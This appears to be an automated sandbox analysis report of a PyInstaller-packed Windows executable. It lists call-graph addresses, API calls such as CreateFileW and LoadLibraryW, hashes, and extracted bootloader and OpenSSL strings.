88133->88134 88135 7ff6fb1ec14d 88133->88135 88134->88113 88134->88114 88135->88134 88252 7ff6fb1ecba8 7 API calls 2 library calls 88135->88252 88253 7ff6fb2097e0 88137->88253 88139 7ff6fb1ec5ab GetStartupInfoW 88139->88122 88141 7ff6fb1e1009 88140->88141 88255 7ff6fb1f4794 88141->88255 88143 7ff6fb1e352b 88262 7ff6fb1e33e0 88143->88262 88147 7ff6fb1eb870 _log10_special 8 API calls 88149 7ff6fb1e372a 88147->88149 
88248 7ff6fb1ec5d8 GetModuleHandleW 88149->88248 88150 7ff6fb1e356c 88153 7ff6fb1e1bf0 49 API calls 88150->88153 88151 7ff6fb1e3736 88152 7ff6fb1e3f70 108 API calls 88151->88152 88154 7ff6fb1e3746 88152->88154 88170 7ff6fb1e3588 88153->88170 88155 7ff6fb1e3785 88154->88155 88348 7ff6fb1e76a0 88154->88348 88357 7ff6fb1e25f0 53 API calls _log10_special 88155->88357 88159 7ff6fb1e3778 88162 7ff6fb1e379f 88159->88162 88163 7ff6fb1e377d 88159->88163 88160 7ff6fb1e3538 88160->88147 88161 7ff6fb1e365f __std_exception_copy 88165 7ff6fb1e3844 88161->88165 88168 7ff6fb1e7e10 14 API calls 88161->88168 88164 7ff6fb1e1bf0 49 API calls 88162->88164 88166 7ff6fb1ef36c 74 API calls 88163->88166 88167 7ff6fb1e37be 88164->88167 88361 7ff6fb1e3e90 49 API calls 88165->88361 88166->88155 88176 7ff6fb1e18f0 115 API calls 88167->88176 88171 7ff6fb1e36ae 88168->88171 88324 7ff6fb1e7e10 88170->88324 88346 7ff6fb1e7f80 40 API calls __std_exception_copy 88171->88346 88172 7ff6fb1e3852 88174 7ff6fb1e3865 88172->88174 88175 7ff6fb1e3871 88172->88175 88362 7ff6fb1e3fe0 88174->88362 88179 7ff6fb1e1bf0 49 API calls 88175->88179 88180 7ff6fb1e37df 88176->88180 88177 7ff6fb1e36bd 88181 7ff6fb1e380f 88177->88181 88184 7ff6fb1e36cf 88177->88184 88195 7ff6fb1e3805 __std_exception_copy 88179->88195 88180->88170 88183 7ff6fb1e37ef 88180->88183 88359 7ff6fb1e8400 58 API calls _log10_special 88181->88359 88182 7ff6fb1e86b0 2 API calls 88186 7ff6fb1e389e SetDllDirectoryW 88182->88186 88358 7ff6fb1e25f0 53 API calls _log10_special 88183->88358 88188 7ff6fb1e1bf0 49 API calls 88184->88188 88194 7ff6fb1e38c3 88186->88194 88192 7ff6fb1e36f1 88188->88192 88189 7ff6fb1e3814 88360 7ff6fb1e7c40 84 API calls 2 library calls 88189->88360 88192->88195 88196 7ff6fb1e36fc 88192->88196 88198 7ff6fb1e3a50 88194->88198 88365 7ff6fb1e6560 53 API calls 88194->88365 88195->88182 88347 7ff6fb1e25f0 53 API calls _log10_special 88196->88347 88197 7ff6fb1e3834 88197->88165 88197->88195 88201 7ff6fb1e3a5a PostMessageW GetMessageW 
88198->88201 88202 7ff6fb1e3a7d 88198->88202 88201->88202 88337 7ff6fb1e3080 88202->88337 88203 7ff6fb1e38d5 88366 7ff6fb1e6b00 118 API calls 2 library calls 88203->88366 88205 7ff6fb1e38ea 88207 7ff6fb1e3947 88205->88207 88209 7ff6fb1e3901 88205->88209 88367 7ff6fb1e65a0 121 API calls _log10_special 88205->88367 88207->88198 88215 7ff6fb1e395c 88207->88215 88222 7ff6fb1e3905 88209->88222 88368 7ff6fb1e6970 91 API calls 88209->88368 88213 7ff6fb1e3916 88213->88222 88369 7ff6fb1e6cd0 54 API calls 88213->88369 88214 7ff6fb1e3a97 88375 7ff6fb1e6780 FreeLibrary 88214->88375 88372 7ff6fb1e30e0 122 API calls 2 library calls 88215->88372 88218 7ff6fb1e3964 88218->88160 88221 7ff6fb1e396c 88218->88221 88220 7ff6fb1e3aa3 88373 7ff6fb1e83e0 LocalFree 88221->88373 88222->88207 88370 7ff6fb1e2870 53 API calls _log10_special 88222->88370 88225 7ff6fb1e393f 88371 7ff6fb1e6780 FreeLibrary 88225->88371 88247->88120 88248->88128 88249->88130 88250->88116 88251->88119 88252->88134 88254 7ff6fb2097d0 88253->88254 88254->88139 88254->88254 88259 7ff6fb1fe790 88255->88259 88256 7ff6fb1fe7e3 88376 7ff6fb1f9b24 37 API calls 2 library calls 88256->88376 88258 7ff6fb1fe80c 88258->88143 88259->88256 88260 7ff6fb1fe836 88259->88260 88377 7ff6fb1fe668 71 API calls _fread_nolock 88260->88377 88378 7ff6fb1ebb70 88262->88378 88265 7ff6fb1e341b 88385 7ff6fb1e29e0 51 API calls _log10_special 88265->88385 88266 7ff6fb1e3438 88380 7ff6fb1e85a0 FindFirstFileExW 88266->88380 88269 7ff6fb1e342e 88274 7ff6fb1eb870 _log10_special 8 API calls 88269->88274 88271 7ff6fb1e34a5 88388 7ff6fb1e8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 88271->88388 88272 7ff6fb1e344b 88386 7ff6fb1e8620 CreateFileW GetFinalPathNameByHandleW CloseHandle 88272->88386 88277 7ff6fb1e34dd 88274->88277 88276 7ff6fb1e34b3 88276->88269 88389 7ff6fb1e26c0 49 API calls _log10_special 88276->88389 88277->88160 88284 7ff6fb1e18f0 88277->88284 88278 7ff6fb1e3458 88279 7ff6fb1e3474 __vcrt_InitializeCriticalSectionEx 
88278->88279 88280 7ff6fb1e345c 88278->88280 88279->88271 88387 7ff6fb1e26c0 49 API calls _log10_special 88280->88387 88283 7ff6fb1e346d 88283->88269 88285 7ff6fb1e3f70 108 API calls 88284->88285 88286 7ff6fb1e1925 88285->88286 88288 7ff6fb1e76a0 83 API calls 88286->88288 88293 7ff6fb1e1bb6 88286->88293 88287 7ff6fb1eb870 _log10_special 8 API calls 88289 7ff6fb1e1bd1 88287->88289 88290 7ff6fb1e196b 88288->88290 88289->88150 88289->88151 88291 7ff6fb1ef9f4 73 API calls 88290->88291 88323 7ff6fb1e199c 88290->88323 88294 7ff6fb1e1985 88291->88294 88292 7ff6fb1ef36c 74 API calls 88292->88293 88293->88287 88295 7ff6fb1e19a1 88294->88295 88296 7ff6fb1e1989 88294->88296 88298 7ff6fb1ef6bc _fread_nolock 53 API calls 88295->88298 88390 7ff6fb1e2760 53 API calls 2 library calls 88296->88390 88299 7ff6fb1e19b9 88298->88299 88300 7ff6fb1e19bf 88299->88300 88301 7ff6fb1e19d7 88299->88301 88391 7ff6fb1e2760 53 API calls 2 library calls 88300->88391 88303 7ff6fb1e19ee 88301->88303 88304 7ff6fb1e1a06 88301->88304 88392 7ff6fb1e2760 53 API calls 2 library calls 88303->88392 88306 7ff6fb1e1bf0 49 API calls 88304->88306 88307 7ff6fb1e1a1d 88306->88307 88308 7ff6fb1e1bf0 49 API calls 88307->88308 88309 7ff6fb1e1a68 88308->88309 88310 7ff6fb1ef9f4 73 API calls 88309->88310 88311 7ff6fb1e1a8c 88310->88311 88312 7ff6fb1e1aa1 88311->88312 88313 7ff6fb1e1ab9 88311->88313 88393 7ff6fb1e2760 53 API calls 2 library calls 88312->88393 88315 7ff6fb1ef6bc _fread_nolock 53 API calls 88313->88315 88316 7ff6fb1e1ace 88315->88316 88317 7ff6fb1e1ad4 88316->88317 88318 7ff6fb1e1aec 88316->88318 88394 7ff6fb1e2760 53 API calls 2 library calls 88317->88394 88395 7ff6fb1ef430 88318->88395 88323->88292 88323->88323 88325 7ff6fb1e7e1a 88324->88325 88326 7ff6fb1e86b0 2 API calls 88325->88326 88327 7ff6fb1e7e39 GetEnvironmentVariableW 88326->88327 88328 7ff6fb1e7ea2 88327->88328 88329 7ff6fb1e7e56 ExpandEnvironmentStringsW 88327->88329 88330 7ff6fb1eb870 _log10_special 8 API calls 88328->88330 88329->88328 
88331 7ff6fb1e7e78 88329->88331 88332 7ff6fb1e7eb4 88330->88332 88404 7ff6fb1e8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 88331->88404 88332->88161 88334 7ff6fb1e7e8a 88335 7ff6fb1eb870 _log10_special 8 API calls 88334->88335 88336 7ff6fb1e7e9a 88335->88336 88336->88161 88405 7ff6fb1e5af0 88337->88405 88340 7ff6fb1e30b9 88374 7ff6fb1e33a0 FreeLibrary 88340->88374 88342 7ff6fb1e30a1 88342->88340 88475 7ff6fb1e5800 88342->88475 88344 7ff6fb1e30ad 88344->88340 88484 7ff6fb1e5990 53 API calls 88344->88484 88346->88177 88347->88160 88349 7ff6fb1e76c4 88348->88349 88350 7ff6fb1ef9f4 73 API calls 88349->88350 88355 7ff6fb1e779b __std_exception_copy 88349->88355 88351 7ff6fb1e76e0 88350->88351 88351->88355 88547 7ff6fb1f6bd8 88351->88547 88353 7ff6fb1ef9f4 73 API calls 88356 7ff6fb1e76f5 88353->88356 88354 7ff6fb1ef6bc _fread_nolock 53 API calls 88354->88356 88355->88159 88356->88353 88356->88354 88356->88355 88357->88160 88358->88160 88359->88189 88360->88197 88361->88172 88363 7ff6fb1e1bf0 49 API calls 88362->88363 88364 7ff6fb1e4010 88363->88364 88364->88195 88364->88364 88365->88203 88366->88205 88367->88209 88368->88213 88369->88222 88370->88225 88371->88207 88372->88218 88374->88214 88375->88220 88376->88258 88377->88258 88379 7ff6fb1e33ec GetModuleFileNameW 88378->88379 88379->88265 88379->88266 88381 7ff6fb1e85f2 88380->88381 88382 7ff6fb1e85df FindClose 88380->88382 88383 7ff6fb1eb870 _log10_special 8 API calls 88381->88383 88382->88381 88384 7ff6fb1e3442 88383->88384 88384->88271 88384->88272 88385->88269 88386->88278 88387->88283 88388->88276 88389->88269 88390->88323 88391->88323 88392->88323 88393->88323 88394->88323 88396 7ff6fb1ef439 88395->88396 88398 7ff6fb1e1b06 88395->88398 88402 7ff6fb1f43f4 11 API calls _get_daylight 88396->88402 88398->88323 88401 7ff6fb1e25f0 53 API calls _log10_special 88398->88401 88399 7ff6fb1ef43e 88403 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 88399->88403 88401->88323 88402->88399 88403->88398 
88404->88334 88406 7ff6fb1e5b05 88405->88406 88407 7ff6fb1e1bf0 49 API calls 88406->88407 88408 7ff6fb1e5b41 88407->88408 88409 7ff6fb1e5b4a 88408->88409 88410 7ff6fb1e5b6d 88408->88410 88495 7ff6fb1e25f0 53 API calls _log10_special 88409->88495 88412 7ff6fb1e3fe0 49 API calls 88410->88412 88414 7ff6fb1e5b85 88412->88414 88413 7ff6fb1e5b63 88416 7ff6fb1eb870 _log10_special 8 API calls 88413->88416 88415 7ff6fb1e5ba3 88414->88415 88496 7ff6fb1e25f0 53 API calls _log10_special 88414->88496 88485 7ff6fb1e3f10 88415->88485 88419 7ff6fb1e308e 88416->88419 88419->88340 88436 7ff6fb1e5c80 88419->88436 88421 7ff6fb1e5bbb 88422 7ff6fb1e3fe0 49 API calls 88421->88422 88424 7ff6fb1e5bd4 88422->88424 88423 7ff6fb1e81a0 3 API calls 88423->88421 88425 7ff6fb1e5bf9 88424->88425 88426 7ff6fb1e5bd9 88424->88426 88491 7ff6fb1e81a0 88425->88491 88497 7ff6fb1e25f0 53 API calls _log10_special 88426->88497 88429 7ff6fb1e5c06 88430 7ff6fb1e5c12 88429->88430 88431 7ff6fb1e5c49 88429->88431 88432 7ff6fb1e86b0 2 API calls 88430->88432 88499 7ff6fb1e50b0 95 API calls 88431->88499 88434 7ff6fb1e5c2a 88432->88434 88498 7ff6fb1e29e0 51 API calls _log10_special 88434->88498 88500 7ff6fb1e4c80 88436->88500 88438 7ff6fb1e5cba 88439 7ff6fb1e5cd3 88438->88439 88440 7ff6fb1e5cc2 88438->88440 88507 7ff6fb1e4450 88439->88507 88532 7ff6fb1e25f0 53 API calls _log10_special 88440->88532 88444 7ff6fb1e5cdf 88533 7ff6fb1e25f0 53 API calls _log10_special 88444->88533 88445 7ff6fb1e5cf0 88448 7ff6fb1e5cff 88445->88448 88449 7ff6fb1e5d10 88445->88449 88447 7ff6fb1e5cce 88447->88342 88534 7ff6fb1e25f0 53 API calls _log10_special 88448->88534 88511 7ff6fb1e4700 88449->88511 88452 7ff6fb1e5d2b 88453 7ff6fb1e5d2f 88452->88453 88454 7ff6fb1e5d40 88452->88454 88535 7ff6fb1e25f0 53 API calls _log10_special 88453->88535 88456 7ff6fb1e5d4f 88454->88456 88457 7ff6fb1e5d60 88454->88457 88536 7ff6fb1e25f0 53 API calls _log10_special 88456->88536 88518 7ff6fb1e45a0 88457->88518 88461 7ff6fb1e5d6f 88537 7ff6fb1e25f0 53 API 
calls _log10_special 88461->88537 88462 7ff6fb1e5d80 88464 7ff6fb1e5d8f 88462->88464 88465 7ff6fb1e5da0 88462->88465 88538 7ff6fb1e25f0 53 API calls _log10_special 88464->88538 88467 7ff6fb1e5db1 88465->88467 88469 7ff6fb1e5dc2 88465->88469 88539 7ff6fb1e25f0 53 API calls _log10_special 88467->88539 88472 7ff6fb1e5dec 88469->88472 88540 7ff6fb1f65c0 73 API calls 88469->88540 88471 7ff6fb1e5dda 88541 7ff6fb1f65c0 73 API calls 88471->88541 88472->88447 88542 7ff6fb1e25f0 53 API calls _log10_special 88472->88542 88476 7ff6fb1e5820 88475->88476 88476->88476 88477 7ff6fb1e5849 88476->88477 88482 7ff6fb1e5860 __std_exception_copy 88476->88482 88546 7ff6fb1e25f0 53 API calls _log10_special 88477->88546 88479 7ff6fb1e5855 88479->88344 88480 7ff6fb1e596b 88480->88344 88481 7ff6fb1e1440 116 API calls 88481->88482 88482->88480 88482->88481 88483 7ff6fb1e25f0 53 API calls 88482->88483 88483->88482 88484->88340 88486 7ff6fb1e3f1a 88485->88486 88487 7ff6fb1e86b0 2 API calls 88486->88487 88488 7ff6fb1e3f3f 88487->88488 88489 7ff6fb1eb870 _log10_special 8 API calls 88488->88489 88490 7ff6fb1e3f67 88489->88490 88490->88421 88490->88423 88492 7ff6fb1e86b0 2 API calls 88491->88492 88493 7ff6fb1e81b4 LoadLibraryW 88492->88493 88494 7ff6fb1e81d3 __std_exception_copy 88493->88494 88494->88429 88495->88413 88496->88415 88497->88413 88498->88413 88499->88413 88502 7ff6fb1e4cac 88500->88502 88501 7ff6fb1e4cb4 88501->88438 88502->88501 88505 7ff6fb1e4e54 88502->88505 88543 7ff6fb1f5db4 48 API calls 88502->88543 88503 7ff6fb1e5017 __std_exception_copy 88503->88438 88504 7ff6fb1e4180 47 API calls 88504->88505 88505->88503 88505->88504 88508 7ff6fb1e4480 88507->88508 88509 7ff6fb1eb870 _log10_special 8 API calls 88508->88509 88510 7ff6fb1e44ea 88509->88510 88510->88444 88510->88445 88512 7ff6fb1e476f 88511->88512 88516 7ff6fb1e471b 88511->88516 88545 7ff6fb1e4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 88512->88545 88514 7ff6fb1e477c 88514->88452 88517 7ff6fb1e475a 
88516->88517 88544 7ff6fb1e4300 MultiByteToWideChar MultiByteToWideChar __std_exception_copy 88516->88544 88517->88452 88519 7ff6fb1e45b5 88518->88519 88520 7ff6fb1e1bf0 49 API calls 88519->88520 88521 7ff6fb1e4601 88520->88521 88522 7ff6fb1e4687 __std_exception_copy 88521->88522 88523 7ff6fb1e1bf0 49 API calls 88521->88523 88525 7ff6fb1eb870 _log10_special 8 API calls 88522->88525 88524 7ff6fb1e4640 88523->88524 88524->88522 88527 7ff6fb1e86b0 2 API calls 88524->88527 88526 7ff6fb1e46dc 88525->88526 88526->88461 88526->88462 88528 7ff6fb1e465a 88527->88528 88529 7ff6fb1e86b0 2 API calls 88528->88529 88530 7ff6fb1e4671 88529->88530 88531 7ff6fb1e86b0 2 API calls 88530->88531 88531->88522 88532->88447 88533->88447 88534->88447 88535->88447 88536->88447 88537->88447 88538->88447 88539->88447 88540->88471 88541->88472 88542->88447 88543->88502 88544->88517 88545->88514 88546->88479 88548 7ff6fb1f6c08 88547->88548 88551 7ff6fb1f66e4 88548->88551 88550 7ff6fb1f6c21 88550->88356 88552 7ff6fb1f672e 88551->88552 88553 7ff6fb1f66ff 88551->88553 88561 7ff6fb1f477c EnterCriticalSection 88552->88561 88562 7ff6fb1f9b24 37 API calls 2 library calls 88553->88562 88556 7ff6fb1f6733 88558 7ff6fb1f6750 38 API calls 88556->88558 88557 7ff6fb1f671f 88557->88550 88559 7ff6fb1f673f 88558->88559 88560 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88559->88560 88560->88557 88562->88557 88563 7ff6fb1eab3c 88564 7ff6fb1e9e3a 88563->88564 88566 7ff6fb1e9eb6 88564->88566 88567 7ff6fb1eb0b0 88564->88567 88568 7ff6fb1eb0d3 88567->88568 88569 7ff6fb1eb0f1 memcpy_s 88567->88569 88571 7ff6fb1fc90c 88568->88571 88569->88566 88572 7ff6fb1fc957 88571->88572 88576 7ff6fb1fc91b _get_daylight 88571->88576 88579 7ff6fb1f43f4 11 API calls _get_daylight 88572->88579 88574 7ff6fb1fc93e RtlAllocateHeap 88575 7ff6fb1fc955 88574->88575 88574->88576 88575->88569 88576->88572 88576->88574 88578 7ff6fb2028a0 EnterCriticalSection LeaveCriticalSection _get_daylight 88576->88578 88578->88576 88579->88575 88580 
7ffdfb381109 88581 7ffdfb397be0 88580->88581 88584 7ffdfb397cd0 88581->88584 88583 7ffdfb397bfb 88585 7ffdfb3812ee 88584->88585 88586 7ffdfb397cf0 SetLastError 88585->88586 88587 7ffdfb397d17 88586->88587 88587->88583 88621 7ffdfb38b370 88624 7ffdfb38b38f 88621->88624 88623 7ffdfb38b4f2 88624->88623 88625 7ffdfb381253 88624->88625 88625->88623 88627 7ffdfb38dc10 88625->88627 88626 7ffdfb38dce6 88626->88623 88627->88626 88628 7ffdfb38dc8e SetLastError 88627->88628 88628->88626 88628->88627 88588 7ff6fb1f4938 88589 7ff6fb1f4952 88588->88589 88590 7ff6fb1f496f 88588->88590 88613 7ff6fb1f43d4 11 API calls _get_daylight 88589->88613 88590->88589 88592 7ff6fb1f4982 CreateFileW 88590->88592 88594 7ff6fb1f49ec 88592->88594 88595 7ff6fb1f49b6 88592->88595 88593 7ff6fb1f4957 88614 7ff6fb1f43f4 11 API calls _get_daylight 88593->88614 88617 7ff6fb1f4f14 46 API calls 3 library calls 88594->88617 88616 7ff6fb1f4a8c 59 API calls 3 library calls 88595->88616 88599 7ff6fb1f49f1 88602 7ff6fb1f49f5 88599->88602 88603 7ff6fb1f4a20 88599->88603 88600 7ff6fb1f495f 88615 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 88600->88615 88601 7ff6fb1f49c4 88605 7ff6fb1f49e1 CloseHandle 88601->88605 88606 7ff6fb1f49cb CloseHandle 88601->88606 88618 7ff6fb1f4368 11 API calls 2 library calls 88602->88618 88619 7ff6fb1f4cd4 51 API calls 88603->88619 88609 7ff6fb1f496a 88605->88609 88606->88609 88610 7ff6fb1f4a2d 88620 7ff6fb1f4e10 21 API calls _fread_nolock 88610->88620 88612 7ff6fb1f49ff 88612->88609 88613->88593 88614->88600 88615->88609 88616->88601 88617->88599 88618->88612 88619->88610 88620->88612 88629 7ffdfb381956 88630 7ffdfb38ffd0 88629->88630 88631 7ffdfb390c2f 00007FFE1FFB6570 88630->88631 88636 7ffdfb390144 88630->88636 88632 7ffdfb390c50 00007FFE1FFB6570 88631->88632 88631->88636 88633 7ffdfb390c70 00007FFE1FFB6570 88632->88633 88632->88636 88634 7ffdfb390c8b 00007FFE1FFB6570 88633->88634 88633->88636 88635 7ffdfb390ca3 00007FFE1FFB6570 88634->88635 88634->88636 88635->88636

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7ff6fb1e1000-7ff6fb1e3536 call 7ff6fb1ef138 call 7ff6fb1ef140 call 7ff6fb1ebb70 call 7ff6fb1f4700 call 7ff6fb1f4794 call 7ff6fb1e33e0 14 7ff6fb1e3544-7ff6fb1e3566 call 7ff6fb1e18f0 0->14 15 7ff6fb1e3538-7ff6fb1e353f 0->15 21 7ff6fb1e356c-7ff6fb1e3583 call 7ff6fb1e1bf0 14->21 22 7ff6fb1e3736-7ff6fb1e374c call 7ff6fb1e3f70 14->22 16 7ff6fb1e371a-7ff6fb1e3735 call 7ff6fb1eb870 15->16 26 7ff6fb1e3588-7ff6fb1e35c1 21->26 27 7ff6fb1e3785-7ff6fb1e379a call 7ff6fb1e25f0 22->27 28 7ff6fb1e374e-7ff6fb1e377b call 7ff6fb1e76a0 22->28 29 7ff6fb1e3653-7ff6fb1e366d call 7ff6fb1e7e10 26->29 30 7ff6fb1e35c7-7ff6fb1e35cb 26->30 41 7ff6fb1e3712 27->41 45 7ff6fb1e379f-7ff6fb1e37be call 7ff6fb1e1bf0 28->45 46 7ff6fb1e377d-7ff6fb1e3780 call 7ff6fb1ef36c 28->46 42 7ff6fb1e3695-7ff6fb1e369c 29->42 43 7ff6fb1e366f-7ff6fb1e3675 29->43 34 7ff6fb1e35cd-7ff6fb1e35e5 call 7ff6fb1f4560 30->34 35 7ff6fb1e3638-7ff6fb1e364d call 7ff6fb1e18e0 30->35 50 7ff6fb1e35f2-7ff6fb1e360a call 7ff6fb1f4560 34->50 51 7ff6fb1e35e7-7ff6fb1e35eb 34->51 35->29 35->30 41->16 53 7ff6fb1e36a2-7ff6fb1e36c0 call 7ff6fb1e7e10 call 7ff6fb1e7f80 42->53 54 7ff6fb1e3844-7ff6fb1e3863 call 7ff6fb1e3e90 42->54 48 7ff6fb1e3682-7ff6fb1e3690 call 7ff6fb1f415c 43->48 49 7ff6fb1e3677-7ff6fb1e3680 43->49 61 7ff6fb1e37c1-7ff6fb1e37ca 45->61 46->27 48->42 49->48 66 7ff6fb1e360c-7ff6fb1e3610 50->66 67 7ff6fb1e3617-7ff6fb1e362f call 7ff6fb1f4560 50->67 51->50 78 7ff6fb1e380f-7ff6fb1e381e call 7ff6fb1e8400 53->78 79 7ff6fb1e36c6-7ff6fb1e36c9 53->79 69 7ff6fb1e3865-7ff6fb1e386f call 7ff6fb1e3fe0 54->69 70 7ff6fb1e3871-7ff6fb1e3882 call 7ff6fb1e1bf0 54->70 61->61 65 7ff6fb1e37cc-7ff6fb1e37e9 call 7ff6fb1e18f0 61->65 65->26 83 7ff6fb1e37ef-7ff6fb1e3800 call 7ff6fb1e25f0 65->83 66->67 67->35 84 7ff6fb1e3631 67->84 81 7ff6fb1e3887-7ff6fb1e38a1 call 7ff6fb1e86b0 69->81 70->81 91 7ff6fb1e3820 78->91 92 7ff6fb1e382c-7ff6fb1e3836 call 7ff6fb1e7c40 78->92 79->78 85 
7ff6fb1e36cf-7ff6fb1e36f6 call 7ff6fb1e1bf0 79->85 93 7ff6fb1e38a3 81->93 94 7ff6fb1e38af-7ff6fb1e38c1 SetDllDirectoryW 81->94 83->41 84->35 100 7ff6fb1e3805-7ff6fb1e380d call 7ff6fb1f415c 85->100 101 7ff6fb1e36fc-7ff6fb1e3703 call 7ff6fb1e25f0 85->101 91->92 92->81 110 7ff6fb1e3838 92->110 93->94 98 7ff6fb1e38c3-7ff6fb1e38ca 94->98 99 7ff6fb1e38d0-7ff6fb1e38ec call 7ff6fb1e6560 call 7ff6fb1e6b00 94->99 98->99 103 7ff6fb1e3a50-7ff6fb1e3a58 98->103 118 7ff6fb1e38ee-7ff6fb1e38f4 99->118 119 7ff6fb1e3947-7ff6fb1e394a call 7ff6fb1e6510 99->119 100->81 107 7ff6fb1e3708-7ff6fb1e370a 101->107 108 7ff6fb1e3a5a-7ff6fb1e3a77 PostMessageW GetMessageW 103->108 109 7ff6fb1e3a7d-7ff6fb1e3a88 call 7ff6fb1e33d0 call 7ff6fb1e3080 103->109 107->41 108->109 120 7ff6fb1e3a8d-7ff6fb1e3aaf call 7ff6fb1e33a0 call 7ff6fb1e6780 call 7ff6fb1e6510 109->120 110->54 121 7ff6fb1e390e-7ff6fb1e3918 call 7ff6fb1e6970 118->121 122 7ff6fb1e38f6-7ff6fb1e3903 call 7ff6fb1e65a0 118->122 127 7ff6fb1e394f-7ff6fb1e3956 119->127 133 7ff6fb1e3923-7ff6fb1e3931 call 7ff6fb1e6cd0 121->133 134 7ff6fb1e391a-7ff6fb1e3921 121->134 122->121 136 7ff6fb1e3905-7ff6fb1e390c 122->136 127->103 131 7ff6fb1e395c-7ff6fb1e3966 call 7ff6fb1e30e0 127->131 131->107 141 7ff6fb1e396c-7ff6fb1e3980 call 7ff6fb1e83e0 131->141 133->127 146 7ff6fb1e3933 133->146 137 7ff6fb1e393a-7ff6fb1e3942 call 7ff6fb1e2870 call 7ff6fb1e6780 134->137 136->137 137->119 151 7ff6fb1e3982-7ff6fb1e399f PostMessageW GetMessageW 141->151 152 7ff6fb1e39a5-7ff6fb1e39e8 call 7ff6fb1e7f20 call 7ff6fb1e7fc0 call 7ff6fb1e6780 call 7ff6fb1e6510 call 7ff6fb1e7ec0 141->152 146->137 151->152 163 7ff6fb1e39ea-7ff6fb1e3a00 call 7ff6fb1e81f0 call 7ff6fb1e7ec0 152->163 164 7ff6fb1e3a3d-7ff6fb1e3a4b call 7ff6fb1e18a0 152->164 163->164 171 7ff6fb1e3a02-7ff6fb1e3a10 163->171 164->107 172 7ff6fb1e3a12-7ff6fb1e3a2c call 7ff6fb1e25f0 call 7ff6fb1e18a0 171->172 173 7ff6fb1e3a31-7ff6fb1e3a38 call 7ff6fb1e2870 171->173 172->107 173->164
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName
                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
                                                              • API String ID: 514040917-1099759049
                                                              • Opcode ID: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                              • Instruction ID: 4351c9cd71c9236011f0d0ad4ca458a0147431b02101637dfaa68685ba63fe4e
                                                              • Opcode Fuzzy Hash: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                              • Instruction Fuzzy Hash: 37F14D61E0868391FB19EB21E5652FD6261AF5D788F844031DA6DC3AE6FF2CF568C340
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                               • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmp
                                                               • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmp
                                                               • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
                                                               • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmp
                                                               • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmp
                                                               • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmp
                                                               • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmp
                                                               • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
                                                              • API String ID: 0-352295518
                                                              • Opcode ID: 10e9551b73dd26cc253e512a061e753fef7e6259af78dc632876357d1c9699b4
                                                              • Instruction ID: 7e05ff9db9aa2c38861f1c02c1081ea02abf3a24abcaed19432e27280c9f3260
                                                              • Opcode Fuzzy Hash: 10e9551b73dd26cc253e512a061e753fef7e6259af78dc632876357d1c9699b4
                                                              • Instruction Fuzzy Hash: 0A727F32B4A64387FB60AA15D464BBD27E2EB44B8CF544135DA6C8B6E8CF7DE584C700

                                                              Control-flow Graph

                                                               • Rendered control-flow graph not preserved in this export: function entry 00007FF6FB205C74, blocks marked Executed / Not Executed, API calls in graph: CreateFileW, GetFileType, GetLastError, CloseHandle
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
